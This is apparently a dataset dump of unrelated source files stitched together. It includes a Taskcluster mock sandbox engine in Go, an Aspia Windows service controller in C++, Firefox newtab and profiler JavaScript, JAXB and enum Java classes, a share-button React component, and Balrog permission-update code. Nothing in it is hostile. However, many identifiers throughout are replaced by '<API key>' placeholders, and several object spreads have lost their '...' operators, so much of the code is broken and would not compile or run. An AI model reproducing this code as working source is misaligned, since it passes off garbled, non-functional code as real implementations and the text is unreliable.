answer stringlengths 15 1.25M |
|---|
colorPicker.on('color:change', function(color) {
// don't let the color saturation fall below 50!
if (color.saturation < 50) {
color.saturation = 50;
}
}); |
package mockengine
import (
"bytes"
"fmt"
"io"
"net/http"
"net/http/httptest"
"net/url"
"strings"
"sync"
"time"
"github.com/taskcluster/taskcluster-worker/engines"
"github.com/taskcluster/taskcluster-worker/runtime"
"github.com/taskcluster/taskcluster-worker/runtime/atomics"
"github.com/taskcluster/taskcluster-worker/runtime/ioext"
)
type mount struct {
volume *volume
readOnly bool
}
// In this example it is easier to just implement with one object.
// This way we won't have to pass data between different instances.
// In larger more complex engines that downloads stuff, etc. it's probably not
// a good idea to implement everything in one structure.
type sandbox struct {
sync.Mutex
engines.SandboxBuilderBase
engines.SandboxBase
engines.ResultSetBase
environment runtime.Environment
payload payloadType
context *runtime.TaskContext
env map[string]string
mounts map[string]*mount
proxies map[string]http.Handler
files map[string][]byte
sessions atomics.WaitGroup
shells []engines.Shell
displays []io.ReadWriteCloser
resolve atomics.Once
result bool
resultErr error
abortErr error
}
////////////////////////// Implementation of SandboxBuilder interface
func (s *sandbox) abortSessions() {
s.Lock()
defer s.Unlock()
s.sessions.Drain()
for _, shell := range s.shells {
shell.Abort()
}
for _, display := range s.displays {
display.Close()
}
}
func (s *sandbox) StartSandbox() (engines.Sandbox, error) {
s.Lock()
defer s.Unlock()
go func() {
// No need to lock access to payload, as it can't be mutated at this point
time.Sleep(time.Duration(s.payload.Delay) * time.Millisecond)
// No need to lock access mounts and proxies either
f := functions[s.payload.Function]
var err error
var result bool
if f == nil {
err = runtime.<API key>("Unknown function")
} else {
result, err = f(s, s.payload.Argument)
}
s.sessions.WaitAndDrain()
s.resolve.Do(func() {
s.result = result
s.resultErr = err
s.abortErr = engines.<API key>
})
}()
return s, nil
}
func (s *sandbox) AttachVolume(mountpoint string, v engines.Volume, readOnly bool) error {
// We can type cast Volume to our internal type as we know the volume was
vol, valid := v.(*volume)
if !valid {
// TODO: Write to some sort of log if the type assertion fails
return fmt.Errorf("invalid volume type")
}
// Lock before we access mounts as this method may be called concurrently
s.Lock()
defer s.Unlock()
if strings.ContainsAny(mountpoint, " ") {
return runtime.<API key>("MockEngine mountpoints cannot contain space")
}
if s.mounts[mountpoint] != nil {
return engines.ErrNamingConflict
}
s.mounts[mountpoint] = &mount{
volume: vol,
readOnly: readOnly,
}
return nil
}
func (s *sandbox) AttachProxy(name string, handler http.Handler) error {
// Lock before we access proxies as this method may be called concurrently
s.Lock()
defer s.Unlock()
if strings.ContainsAny(name, " ") {
return runtime.<API key>(
"MockEngine proxy names cannot contain space.",
"Was given proxy name: '", name, "' which isn't allowed!",
)
}
if s.proxies[name] != nil {
return engines.ErrNamingConflict
}
s.proxies[name] = handler
return nil
}
func (s *sandbox) <API key>(name string, value string) error {
s.Lock()
defer s.Unlock()
if strings.Contains(name, " ") {
return runtime.<API key>(
"MockEngine environment variable names cannot contain space.",
"Was given environment variable name: '", name, "' which isn't allowed!",
)
}
if _, ok := s.env[name]; ok {
return engines.ErrNamingConflict
}
s.env[name] = value
return nil
}
////////////////////////// Implementation of Sandbox interface
// List of functions implementing the task.payload.start.function functionality.
var functions = map[string]func(*sandbox, string) (bool, error){
"true": func(s *sandbox, arg string) (bool, error) { return true, nil },
"false": func(s *sandbox, arg string) (bool, error) { return false, nil },
"write-volume": func(s *sandbox, arg string) (bool, error) {
// Parse arg as: <mountPoint>/<file_name>:<fileData>
args := strings.SplitN(arg, "/", 2)
volumeName := args[0]
args = strings.SplitN(args[1], ":", 2)
fileName := args[0]
fileData := args[1]
mount := s.mounts[volumeName]
if mount == nil || mount.readOnly {
return false, nil
}
mount.volume.files[fileName] = fileData
return true, nil
},
"read-volume": func(s *sandbox, arg string) (bool, error) {
// Parse arg as: <mountPoint>/<fileName>
args := strings.SplitN(arg, "/", 2)
volumeName := args[0]
fileName := args[1]
mount := s.mounts[volumeName]
if mount == nil {
return false, nil
}
s.context.Log(mount.volume.files[fileName])
return mount.volume.files[fileName] != "", nil
},
"get-url": func(s *sandbox, arg string) (bool, error) {
res, err := http.Get(arg)
if err != nil {
s.context.Log("Failed to get url: ", arg, " err: ", err)
return false, nil
}
defer res.Body.Close()
io.Copy(s.context.LogDrain(), res.Body)
return res.StatusCode == http.StatusOK, nil
},
"ping-proxy": func(s *sandbox, arg string) (bool, error) {
u, err := url.Parse(arg)
if err != nil {
s.context.Log("Failed to parse url: ", arg, " got error: ", err)
return false, nil
}
handler := s.proxies[u.Host]
if handler == nil {
s.context.Log("No proxy for hostname: ", u.Host, " in: ", arg)
return false, nil
}
// Make a fake HTTP request and http response recorder
s.context.Log("Pinging")
req, err := http.NewRequest("GET", arg, nil)
if err != nil {
panic(err)
}
w := httptest.NewRecorder()
handler.ServeHTTP(w, req)
// Log response
s.context.Log(w.Body.String())
return w.Code == http.StatusOK, nil
},
"write-log": func(s *sandbox, arg string) (bool, error) {
s.context.Log(arg)
return true, nil
},
"write-error-log": func(s *sandbox, arg string) (bool, error) {
s.context.Log(arg)
return false, nil
},
"write-log-sleep": func(s *sandbox, arg string) (bool, error) {
s.context.Log(arg)
time.Sleep(500 * time.Millisecond)
return true, nil
},
"write-files": func(s *sandbox, arg string) (bool, error) {
for _, path := range strings.Split(arg, " ") {
s.files[path] = []byte("Hello World")
}
return true, nil
},
"print-env-var": func(s *sandbox, arg string) (bool, error) {
val, ok := s.env[arg]
s.context.Log(val)
return ok, nil
},
"<API key>": func(s *sandbox, arg string) (bool, error) {
// Should normally only be used if error is reported with Monitor
return false, runtime.<API key>
},
"<API key>": func(s *sandbox, arg string) (bool, error) {
// Should normally only be used if error is reported with Monitor
return false, runtime.<API key>
},
"<API key>": func(s *sandbox, arg string) (bool, error) {
return false, runtime.<API key>(s.payload.Argument)
},
"stopNow-sleep": func(s *sandbox, arg string) (bool, error) {
// This is not really a reasonable thing for an engine to do. But it's
// useful for testing... StopNow causes all running tasks to be resolved
// 'exception' with reason: 'worker-shutdown'.
s.environment.Worker.StopNow()
time.Sleep(500 * time.Millisecond)
return true, nil
},
}
func (s *sandbox) WaitForResult() (engines.ResultSet, error) {
s.resolve.Wait()
if s.resultErr != nil {
return nil, s.resultErr
}
return s, nil
}
func (s *sandbox) Kill() error {
s.resolve.Do(func() {
s.abortSessions()
s.result = false
s.abortErr = engines.<API key>
})
s.resolve.Wait()
return s.resultErr
}
func (s *sandbox) Abort() error {
s.resolve.Do(func() {
s.abortSessions()
s.result = false
s.resultErr = engines.ErrSandboxAborted
})
s.resolve.Wait()
return s.abortErr
}
func (s *sandbox) NewShell(command []string, tty bool) (engines.Shell, error) {
s.Lock()
defer s.Unlock()
if len(command) > 0 || tty {
return nil, engines.<API key>
}
if s.sessions.Add(1) != nil {
return nil, engines.<API key>
}
shell := newShell()
s.shells = append(s.shells, shell)
go func() {
shell.Wait()
s.sessions.Done()
}()
return shell, nil
}
func (s *sandbox) ListDisplays() ([]engines.Display, error) {
return []engines.Display{
{
Name: "MockDisplay",
Description: "Simple mock VNC display rendering a static test image",
Width: mockDisplayWidth,
Height: mockDisplayHeight,
},
}, nil
}
func (s *sandbox) OpenDisplay(name string) (io.ReadWriteCloser, error) {
s.Lock()
defer s.Unlock()
if name != "MockDisplay" {
return nil, engines.ErrNoSuchDisplay
}
if s.sessions.Add(1) != nil {
return nil, engines.<API key>
}
d := ioext.WatchPipe(newMockDisplay(), func(error) {
s.sessions.Done()
})
s.displays = append(s.displays, d)
return d, nil
}
////////////////////////// Implementation of ResultSet interface
func (s *sandbox) ExtractFile(path string) (ioext.ReadSeekCloser, error) {
data := s.files[path]
if len(data) == 0 {
return nil, engines.ErrResourceNotFound
}
return ioext.NopCloser(bytes.NewReader(data)), nil
}
func (s *sandbox) ExtractFolder(folder string, handler engines.FileHandler) error {
if !strings.HasSuffix(folder, "/") {
folder += "/"
}
wg := sync.WaitGroup{}
m := sync.Mutex{}
handlerError := false
foundFolder := false
for p, data := range s.files {
if strings.HasPrefix(p, folder) {
foundFolder = true
wg.Add(1)
go func(p string, data []byte) {
p = p[len(folder):] // Note: folder always ends with slash
err := handler(p, ioext.NopCloser(bytes.NewReader(data)))
if err != nil {
m.Lock()
handlerError = true
m.Unlock()
}
wg.Done()
}(p, data)
}
}
wg.Wait()
if !foundFolder {
return engines.ErrResourceNotFound
}
if handlerError {
return engines.ErrHandlerInterrupt
}
return nil
}
func (s *sandbox) Success() bool {
// No need to lock access as result is immutable
return s.result
} |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">
<html>
<head>
<title>DLP Control</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"
bgcolor="#FFFFFF" fgcolor="#009900" link="#009933" vlink="#009933"
alink="#006666">
<br><br>
<center>
<table border="0" width="65%" cellspacing="0" cellpadding="3">
<tr>
<th colspan="2" style="background-color:#009933;color:white">Rabbit Semiconductor Download Manager</th>
</tr>
<tr>
<td style="background-color:#CCCCCC;color:black">Exit this program and reboot Download Manager</td>
<td style="background-color:#CCCCCC;color:black"><a href="/reboot.cgi">Reboot</a></td>
</tr>
</table>
</body>
<head>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
</html> |
// Aspia Project
// This program is free software: you can redistribute it and/or modify
// (at your option) any later version.
// This program is distributed in the hope that it will be useful,
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#include "base/service_controller.h"
#include <memory>
#include "base/logging.h"
namespace base {
ServiceController::ServiceController() = default;
ServiceController::ServiceController(SC_HANDLE sc_manager, SC_HANDLE service)
: sc_manager_(sc_manager),
service_(service)
{
// Nothing
}
ServiceController::ServiceController(ServiceController&& other) noexcept
: sc_manager_(std::move(other.sc_manager_)),
service_(std::move(other.service_))
{
// Nothing
}
ServiceController& ServiceController::operator=(ServiceController&& other) noexcept
{
sc_manager_ = std::move(other.sc_manager_);
service_ = std::move(other.service_);
return *this;
}
ServiceController::~ServiceController() = default;
// static
ServiceController ServiceController::open(const QString& name)
{
win::ScopedScHandle sc_manager(OpenSCManagerW(nullptr, nullptr, <API key>));
if (!sc_manager.isValid())
{
PLOG(LS_WARNING) << "OpenSCManagerW failed";
return ServiceController();
}
win::ScopedScHandle service(OpenServiceW(sc_manager,
qUtf16Printable(name),
SERVICE_ALL_ACCESS));
if (!service.isValid())
{
PLOG(LS_WARNING) << "OpenServiceW failed";
return ServiceController();
}
return ServiceController(sc_manager.release(), service.release());
}
// static
ServiceController ServiceController::install(const QString& name,
const QString& display_name,
const QString& file_path)
{
win::ScopedScHandle sc_manager(OpenSCManagerW(nullptr, nullptr, <API key>));
if (!sc_manager.isValid())
{
PLOG(LS_WARNING) << "OpenSCManagerW failed";
return ServiceController();
}
QString <API key> = file_path;
<API key>.replace(QLatin1Char('/'), QLatin1Char('\\'));
win::ScopedScHandle service(CreateServiceW(sc_manager,
qUtf16Printable(name),
qUtf16Printable(display_name),
SERVICE_ALL_ACCESS,
<API key>,
SERVICE_AUTO_START,
<API key>,
qUtf16Printable(<API key>),
nullptr,
nullptr,
nullptr,
nullptr,
nullptr));
if (!service.isValid())
{
PLOG(LS_WARNING) << "CreateServiceW failed";
return ServiceController();
}
SC_ACTION action;
action.Type = SC_ACTION_RESTART;
action.Delay = 60000; // 60 seconds
<API key> actions;
actions.dwResetPeriod = 0;
actions.lpRebootMsg = nullptr;
actions.lpCommand = nullptr;
actions.cActions = 1;
actions.lpsaActions = &action;
if (!<API key>(service, <API key>, &actions))
{
PLOG(LS_WARNING) << "<API key> failed";
return ServiceController();
}
return ServiceController(sc_manager.release(), service.release());
}
// static
bool ServiceController::remove(const QString& name)
{
win::ScopedScHandle sc_manager(OpenSCManagerW(nullptr, nullptr, <API key>));
if (!sc_manager.isValid())
{
PLOG(LS_WARNING) << "OpenSCManagerW failed";
return false;
}
win::ScopedScHandle service(OpenServiceW(sc_manager,
qUtf16Printable(name),
SERVICE_ALL_ACCESS));
if (!service.isValid())
{
PLOG(LS_WARNING) << "OpenServiceW failed";
return false;
}
if (!DeleteService(service))
{
PLOG(LS_WARNING) << "DeleteService failed";
return false;
}
service.reset();
sc_manager.reset();
static const int kMaxAttempts = 15;
static const int kAttemptInterval = 100;
for (int i = 0; i < kMaxAttempts; ++i)
{
if (!isInstalled(name))
return true;
Sleep(kAttemptInterval);
}
return false;
}
// static
bool ServiceController::isInstalled(const QString& name)
{
win::ScopedScHandle sc_manager(OpenSCManagerW(nullptr, nullptr, SC_MANAGER_CONNECT));
if (!sc_manager.isValid())
{
PLOG(LS_WARNING) << "OpenSCManagerW failed";
return false;
}
win::ScopedScHandle service(OpenServiceW(sc_manager,
qUtf16Printable(name),
<API key>));
if (!service.isValid())
{
if (GetLastError() != <API key>)
{
PLOG(LS_WARNING) << "OpenServiceW failed";
}
return false;
}
return true;
}
void ServiceController::close()
{
service_.reset();
sc_manager_.reset();
}
bool ServiceController::setDescription(const QString& description)
{
<API key> service_description;
service_description.lpDescription = const_cast<LPWSTR>(qUtf16Printable(description));
// Set the service description.
if (!<API key>(service_, <API key>, &service_description))
{
PLOG(LS_WARNING) << "<API key> failed";
return false;
}
return true;
}
QString ServiceController::description() const
{
DWORD bytes_needed = 0;
if (<API key>(service_, <API key>, nullptr, 0, &bytes_needed) ||
GetLastError() != <API key>)
{
LOG(LS_FATAL) << "<API key>: unexpected result";
return QString();
}
if (!bytes_needed)
return QString();
std::unique_ptr<uint8_t[]> buffer = std::make_unique<uint8_t[]>(bytes_needed);
if (!<API key>(service_, <API key>, buffer.get(), bytes_needed,
&bytes_needed))
{
PLOG(LS_WARNING) << "<API key> failed";
return QString();
}
SERVICE_DESCRIPTION* service_description =
reinterpret_cast<SERVICE_DESCRIPTION*>(buffer.get());
if (!service_description->lpDescription)
return QString();
return QString::fromUtf16(reinterpret_cast<const ushort*>(service_description->lpDescription));
}
bool ServiceController::setDependencies(const QStringList& dependencies)
{
QByteArray buffer;
for (auto it = dependencies.constBegin(); it != dependencies.constEnd(); ++it)
{
const QString& str = *it;
buffer += QByteArray(reinterpret_cast<const char*>(str.utf16()),
(str.length() + 1) * sizeof(wchar_t));
}
buffer.append(static_cast<char>(0));
buffer.append(static_cast<char>(0));
if (!<API key>(service_,
SERVICE_NO_CHANGE,
SERVICE_NO_CHANGE,
SERVICE_NO_CHANGE,
nullptr, nullptr, nullptr,
reinterpret_cast<const wchar_t*>(buffer.data()),
nullptr, nullptr, nullptr))
{
PLOG(LS_WARNING) << "<API key> failed";
return false;
}
return true;
}
QStringList ServiceController::dependencies() const
{
DWORD bytes_needed = 0;
if (QueryServiceConfigW(service_, nullptr, 0, &bytes_needed) ||
GetLastError() != <API key>)
{
LOG(LS_FATAL) << "QueryServiceConfigW: unexpected result";
return QStringList();
}
if (!bytes_needed)
return QStringList();
std::unique_ptr<uint8_t[]> buffer = std::make_unique<uint8_t[]>(bytes_needed);
<API key>* service_config = reinterpret_cast<<API key>*>(buffer.get());
if (!QueryServiceConfigW(service_, service_config, bytes_needed, &bytes_needed))
{
PLOG(LS_WARNING) << "QueryServiceConfigW failed";
return QStringList();
}
if (!service_config->lpDependencies)
return QStringList();
QStringList list;
size_t len = 0;
for (;;)
{
QString str = QString::fromWCharArray(service_config->lpDependencies + len);
len += str.length() + 1;
if (str.isEmpty())
break;
list.append(str);
}
return list;
}
QString ServiceController::filePath() const
{
DWORD bytes_needed = 0;
if (QueryServiceConfigW(service_, nullptr, 0, &bytes_needed) ||
GetLastError() != <API key>)
{
LOG(LS_FATAL) << "QueryServiceConfigW: unexpected result";
return QString();
}
if (!bytes_needed)
return QString();
std::unique_ptr<uint8_t[]> buffer = std::make_unique<uint8_t[]>(bytes_needed);
<API key>* service_config = reinterpret_cast<<API key>*>(buffer.get());
if (!QueryServiceConfigW(service_, service_config, bytes_needed, &bytes_needed))
{
PLOG(LS_WARNING) << "QueryServiceConfigW failed";
return QString();
}
if (!service_config->lpBinaryPathName)
return QString();
return QString::fromUtf16(reinterpret_cast<const ushort*>(service_config->lpBinaryPathName));
}
bool ServiceController::isValid() const
{
return sc_manager_.isValid() && service_.isValid();
}
bool ServiceController::isRunning() const
{
SERVICE_STATUS status;
if (!QueryServiceStatus(service_, &status))
{
PLOG(LS_WARNING) << "QueryServiceStatus failed";
return false;
}
return status.dwCurrentState != SERVICE_STOPPED;
}
bool ServiceController::start()
{
if (!StartServiceW(service_, 0, nullptr))
{
PLOG(LS_WARNING) << "StartServiceW failed";
return false;
}
return true;
}
bool ServiceController::stop()
{
SERVICE_STATUS status;
if (!ControlService(service_, <API key>, &status))
{
PLOG(LS_WARNING) << "ControlService failed";
return false;
}
bool is_stopped = status.dwCurrentState == SERVICE_STOPPED;
int number_of_attempts = 0;
while (!is_stopped && number_of_attempts < 15)
{
Sleep(250);
if (!QueryServiceStatus(service_, &status))
break;
is_stopped = status.dwCurrentState == SERVICE_STOPPED;
++number_of_attempts;
}
return is_stopped;
}
} // namespace base |
#define WIN32_LEAN_AND_MEAN
#define DX_INIT_STRUCT(ddstruct) {memset(&ddstruct, 0, sizeof(ddstruct)); ddstruct.dwSize = sizeof(ddstruct);}
#define DX_REMOVE(dxo) {if(dxo) dxo->Release(); dxo = NULL;} |
export const selectLayoutRender = (state, prefs, rickRollCache) => {
const { layout, feeds, spocs } = state;
let spocIndex = 0;
let bufferRollCache = [];
// Records the chosen and unchosen spocs by the probability selection.
let chosenSpocs = new Set();
let unchosenSpocs = new Set();
function rollForSpocs(data, spocsConfig) {
const recommendations = [...data.recommendations];
for (let position of spocsConfig.positions) {
const spoc = spocs.data.spocs[spocIndex];
if (!spoc) {
break;
}
// Cache random number for a position
let rickRoll;
if (!rickRollCache.length) {
rickRoll = Math.random();
bufferRollCache.push(rickRoll);
} else {
rickRoll = rickRollCache.shift();
bufferRollCache.push(rickRoll);
}
if (rickRoll <= spocsConfig.probability) {
spocIndex++;
recommendations.splice(position.index, 0, spoc);
chosenSpocs.add(spoc);
} else {
unchosenSpocs.add(spoc);
}
}
return {
data,
recommendations,
};
}
const positions = {};
const DS_COMPONENTS = [
"Message",
"SectionTitle",
"Navigation",
"CardGrid",
"Hero",
"HorizontalRule",
"List",
];
const filterArray = [];
if (!prefs["feeds.topsites"]) {
filterArray.push("TopSites");
}
if (!prefs["feeds.section.topstories"]) {
filterArray.push(...DS_COMPONENTS);
}
const <API key> = component => {
const data = {
recommendations: [],
};
let items = 0;
if (component.properties && component.properties.items) {
items = component.properties.items;
}
for (let i = 0; i < items; i++) {
data.recommendations.push({ placeholder: true });
}
return { ...component, data };
};
const handleComponent = component => {
positions[component.type] = positions[component.type] || 0;
const feed = feeds.data[component.feed.url];
let data = {
recommendations: [],
};
if (feed && feed.data) {
data = {
feed.data,
recommendations: [...(feed.data.recommendations || [])],
};
}
if (component && component.properties && component.properties.offset) {
data = {
data,
recommendations: data.recommendations.slice(
component.properties.offset
),
};
}
// Ensure we have recs available for this feed.
const hasRecs = data && data.recommendations;
// Do we ever expect to possibly have a spoc.
if (
hasRecs &&
component.spocs &&
component.spocs.positions &&
component.spocs.positions.length
) {
// We expect a spoc, spocs are loaded, and the server returned spocs.
if (spocs.loaded && spocs.data.spocs && spocs.data.spocs.length) {
data = rollForSpocs(data, component.spocs);
}
}
let items = 0;
if (component.properties && component.properties.items) {
items = Math.min(component.properties.items, data.recommendations.length);
}
// loop through a component items
// Store the items position sequentially for multiple components of the same type.
// Example: A second card grid starts pos offset from the last card grid.
for (let i = 0; i < items; i++) {
data.recommendations[i] = {
data.recommendations[i],
pos: positions[component.type]++,
};
}
return { ...component, data };
};
const renderLayout = () => {
const renderedLayoutArray = [];
for (const row of layout.filter(
r => r.components.filter(c => !filterArray.includes(c.type)).length
)) {
let components = [];
renderedLayoutArray.push({
row,
components,
});
for (const component of row.components.filter(
c => !filterArray.includes(c.type)
)) {
if (component.feed) {
const spocsConfig = component.spocs;
// Are we still waiting on a feed/spocs, render what we have,
// add a placeholder for this component, and bail out early.
if (
!feeds.data[component.feed.url] ||
(spocsConfig &&
spocsConfig.positions &&
spocsConfig.positions.length &&
!spocs.loaded)
) {
components.push(<API key>(component));
return renderedLayoutArray;
}
components.push(handleComponent(component));
} else {
components.push(component);
}
}
}
return renderedLayoutArray;
};
const layoutRender = renderLayout(layout);
// If empty, fill rickRollCache with random probability values from bufferRollCache
if (!rickRollCache.length) {
rickRollCache.push(...bufferRollCache);
}
// Generate the payload for the SPOCS Fill ping. Note that a SPOC could be rejected
// by the `<API key>` first, then gets chosen for the next position. For
// all other SPOCS that never went through the probabilistic selection, its reason will
// be "out_of_position".
let spocsFill = [];
if (spocs.loaded && feeds.loaded && spocs.data.spocs) {
const chosenSpocsFill = [...chosenSpocs].map(spoc => ({
id: spoc.id,
reason: "n/a",
displayed: 1,
full_recalc: 0,
}));
const unchosenSpocsFill = [...unchosenSpocs]
.filter(spoc => !chosenSpocs.has(spoc))
.map(spoc => ({
id: spoc.id,
reason: "<API key>",
displayed: 0,
full_recalc: 0,
}));
const <API key> = spocs.data.spocs
.slice(spocIndex)
.filter(spoc => !unchosenSpocs.has(spoc))
.map(spoc => ({
id: spoc.id,
reason: "out_of_position",
displayed: 0,
full_recalc: 0,
}));
spocsFill = [
chosenSpocsFill,
unchosenSpocsFill,
<API key>,
];
}
return { spocsFill, layoutRender };
}; |
package org.oasis_open.docs.wsn.b_2;
import java.util.ArrayList;
import java.util.List;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlAnyElement;
import javax.xml.bind.annotation.XmlRootElement;
import javax.xml.bind.annotation.XmlType;
import org.w3c.dom.Element;
@XmlAccessorType(XmlAccessType.FIELD)
@XmlType(name = "", propOrder = {
"any"
})
@XmlRootElement(name = "<API key>")
public class <API key> {
@XmlAnyElement(lax = true)
protected List<Object> any;
/**
* Gets the value of the any property.
*
* <p>
* This accessor method returns a reference to the live list,
* not a snapshot. Therefore any modification you make to the
* returned list will be present inside the JAXB object.
* This is why there is not a <CODE>set</CODE> method for the any property.
*
* <p>
* For example, to add a new item, do as follows:
* <pre>
* getAny().add(newItem);
* </pre>
*
*
* <p>
* Objects of the following type(s) are allowed in the list
* {@link Element }
* {@link Object }
*
*
*/
public List<Object> getAny() {
if (any == null) {
any = new ArrayList<Object>();
}
return this.any;
}
} |
package org.seedstack.seed.it.internal;
import org.seedstack.seed.ErrorCode;
/**
* Enumerates all IT error codes.
*
* @author adrien.lauer@mpsa.com
*/
public enum ITErrorCode implements ErrorCode {
<API key>,
<API key>,
<API key>,
<API key>,
<API key>,
<API key>,
<API key>,
<API key>,
<API key>, <API key>, <API key>
} |
// @flow
import * as React from 'react';
import { Provider } from 'react-redux';
import { render } from 'firefox-profiler/test/fixtures/testing-library';
import { CallTreeSidebar } from '../../components/sidebar/CallTreeSidebar';
import {
<API key>,
<API key>,
<API key>,
} from '../../actions/profile-view';
import { storeWithProfile } from '../fixtures/stores';
import {
<API key>,
<API key>,
} from '../fixtures/profiles/processed-profile';
import type { CallNodePath } from 'firefox-profiler/types';
import { ensureExists } from '../../utils/flow';
import { fireFullClick } from '../fixtures/utils';
describe('CallTreeSidebar', function () {
function <API key>() {
return <API key>(`
A A A A
B B B B
Cjs Cjs H[cat:Layout] H[cat:Layout]
D F I[cat:Idle]
Ejs Ejs
`);
}
function <API key>() {
const result = <API key>(`
A A A
B B B
C[cat:Layout] C[cat:Layout] C[cat:Layout]
D[cat:Layout]
`);
const {
profile,
<API key>: [{ C, D }],
} = result;
const layout = ensureExists(
ensureExists(
profile.meta.categories,
'Expected to find categories.'
).find((category) => category.name === 'Layout'),
'Could not find Layout category.'
);
const [{ frameTable, stackTable }] = profile.threads;
const fakeC = layout.subcategories.length;
layout.subcategories.push('FakeSubCategoryC');
const fakeD = layout.subcategories.length;
layout.subcategories.push('FakeSubCategoryD');
// The frames, funcs, and stacks all share the same indexes with the layout
// of the stacks.
frameTable.subcategory[C] = fakeC;
frameTable.subcategory[D] = fakeD;
stackTable.subcategory[C] = fakeC;
stackTable.subcategory[D] = fakeD;
return result;
}
function setup({ profile, <API key> }) {
const store = storeWithProfile(profile);
const selectNode = (nodePath: CallNodePath) => {
store.dispatch(<API key>(0, nodePath));
};
const invertCallstack = () => store.dispatch(<API key>(true));
const renderResult = render(
<Provider store={store}>
<CallTreeSidebar />
</Provider>
);
return {
renderResult,
store,
funcNamesDict: <API key>[0],
selectNode,
invertCallstack,
};
}
it('matches the snapshots when displaying data about the currently selected node', () => {
const {
selectNode,
funcNamesDict: { A, B, Cjs, D, H, Ejs },
container,
} = setup(<API key>());
expect(container.firstChild).toMatchSnapshot();
// Cjs is a JS node, but has no self time, so we shouldn't see the
// implementation information.
selectNode([A, B, Cjs]);
expect(container.firstChild).toMatchSnapshot();
selectNode([A, B, Cjs, D]);
expect(container.firstChild).toMatchSnapshot();
selectNode([A, B, H]);
expect(container.firstChild).toMatchSnapshot();
selectNode([A, B, Cjs, D, Ejs]);
expect(container.firstChild).toMatchSnapshot();
});
it('matches the snapshots when displaying data about the currently selected node in an inverted tree', () => {
const {
selectNode,
invertCallstack,
funcNamesDict: { A, B, H, Ejs, I },
container,
} = setup(<API key>());
invertCallstack();
expect(container.firstChild).toMatchSnapshot();
selectNode([Ejs]);
expect(container.firstChild).toMatchSnapshot();
selectNode([H]);
expect(container.firstChild).toMatchSnapshot();
selectNode([I, H]);
expect(container.firstChild).toMatchSnapshot();
selectNode([H, B, A]);
expect(container.firstChild).toMatchSnapshot();
});
it("doesn't show implementation breakdowns when self and total time in profile is zero", () => {
const {
dispatch,
queryByText,
getAllByText,
funcNamesDict: { A, B, D },
} = setup(
<API key>(
`
A A A
B B C
D E F
`,
`
A A A
B B B
G I E
`
)
);
dispatch(<API key>(new Set([2])));
dispatch(<API key>(2, [A]));
expect(queryByText(/Implementation/)).not.toBeInTheDocument();
dispatch(<API key>(2, [A, B, D]));
expect(getAllByText(/Implementation/).length).toBeGreaterThan(0);
});
it('can expand subcategories', () => {
const {
selectNode,
container,
queryByText,
getByText,
funcNamesDict: { A, B, C },
} = setup(<API key>());
selectNode([A, B, C]);
expect(queryByText('FakeSubCategoryC')).not.toBeInTheDocument();
const layoutCategory = getByText('Layout');
fireFullClick(layoutCategory);
expect(getByText('FakeSubCategoryC')).toBeInTheDocument();
expect(container.firstChild).toMatchSnapshot();
});
}); |
import { Email, Facebook, Linkedin, Print, Twitter } from '@amsterdam/asc-assets'
import { ShareButton, themeSpacing } from '@amsterdam/asc-ui'
import type { FunctionComponent } from 'react'
import { useCallback } from 'react'
import styled, { css } from 'styled-components'
import getShareUrl from '../../utils/shareUrl'
export interface ShareBarProps {
topSpacing?: number
}
const ShareBarContainer = styled.div<ShareBarProps>`
display: flex;
${({ topSpacing }) =>
topSpacing &&
css`
margin-top: ${themeSpacing(topSpacing)};
`}
& > * {
margin-right: 5px;
}
`
const ShareBar: FunctionComponent<ShareBarProps> = ({ ...otherProps }) => {
const handlePageShare = useCallback((target) => {
const link = getShareUrl(target)
if (link) {
window.open(link.url, link.target)
}
}, [])
return (
<ShareBarContainer {...otherProps} data-testid="sharebar">
<ShareButton
// @ts-ignore
type="button"
onClick={() => handlePageShare('facebook')}
hoverColor="#3b5999"
iconSize={30}
title="Deel op Facebook"
>
<Facebook />
</ShareButton>
<ShareButton
// @ts-ignore
type="button"
onClick={() => handlePageShare('twitter')}
hoverColor="#55acee"
title="Deel op Twitter"
>
<Twitter />
</ShareButton>
<ShareButton
// @ts-ignore
type="button"
onClick={() => handlePageShare('linkedin')}
hoverColor="#0077B5"
title="Deel op LinkedIn"
>
<Linkedin />
</ShareButton>
<ShareButton
// @ts-ignore
type="button"
onClick={() => handlePageShare('email')}
title="Deel via email"
>
<Email />
</ShareButton>
<ShareButton
// @ts-ignore
type="button"
onClick={() => {
window.print()
}}
title="Print deze pagina"
>
<Print />
</ShareButton>
</ShareBarContainer>
)
}
export default ShareBar |
import { equals } from 'ramda';
import {
addRole,
removeRole,
<API key>,
<API key>,
<API key>,
} from '../../../services/users';
import {
<API key>,
<API key>,
} from '../../../utils/userUtils';
export default params => {
const {
username,
roles,
originalRoles,
additionalRoles,
permissions,
originalPermissions,
<API key>,
} = params;
const currentRoles = roles.map(role => role.name);
const removedRoles = originalRoles.filter(
role => !currentRoles.includes(role.name)
);
const currentPermissions = permissions.map(p => p.name);
const removedPermissions = originalPermissions.filter(
p => !currentPermissions.includes(p.name)
);
return Promise.all(
[].concat(
additionalRoles.map(role => addRole(username, role.name)),
removedRoles.map(role =>
removeRole(username, role.name, role.data_version)
),
permissions.map(permission => {
let skip = false;
originalPermissions.forEach(value => {
const newOptions = permission.sc
? permission.sc.options
: permission.options;
const originalOptions = value.sc ? value.sc.options : value.options;
if (
value.name === permission.name &&
equals(newOptions, originalOptions)
) {
skip = true;
}
});
if (skip) {
return;
}
if (
permission.sc &&
equals(permission.options, permission.sc.options)
) {
return <API key>({
scId: permission.sc.sc_id,
scDataVersion: permission.sc.sc_data_version,
});
}
const options = {};
if (<API key>(permission.name)) {
options.products = permission.sc
? permission.sc.options.products
: permission.options.products;
}
if (<API key>(permission.name)) {
options.actions = permission.sc
? permission.sc.options.actions
: permission.options.actions;
}
if (permission.sc) {
return <API key>({
username,
permission: permission.name,
options,
dataVersion: permission.data_version,
scId: permission.sc.sc_id,
scDataVersion: permission.sc.sc_data_version,
when: new Date().getTime() + 5000,
});
}
return <API key>({
username,
permission: permission.name,
options,
dataVersion: permission.data_version,
changeType: 'update',
when: new Date().getTime() + 5000,
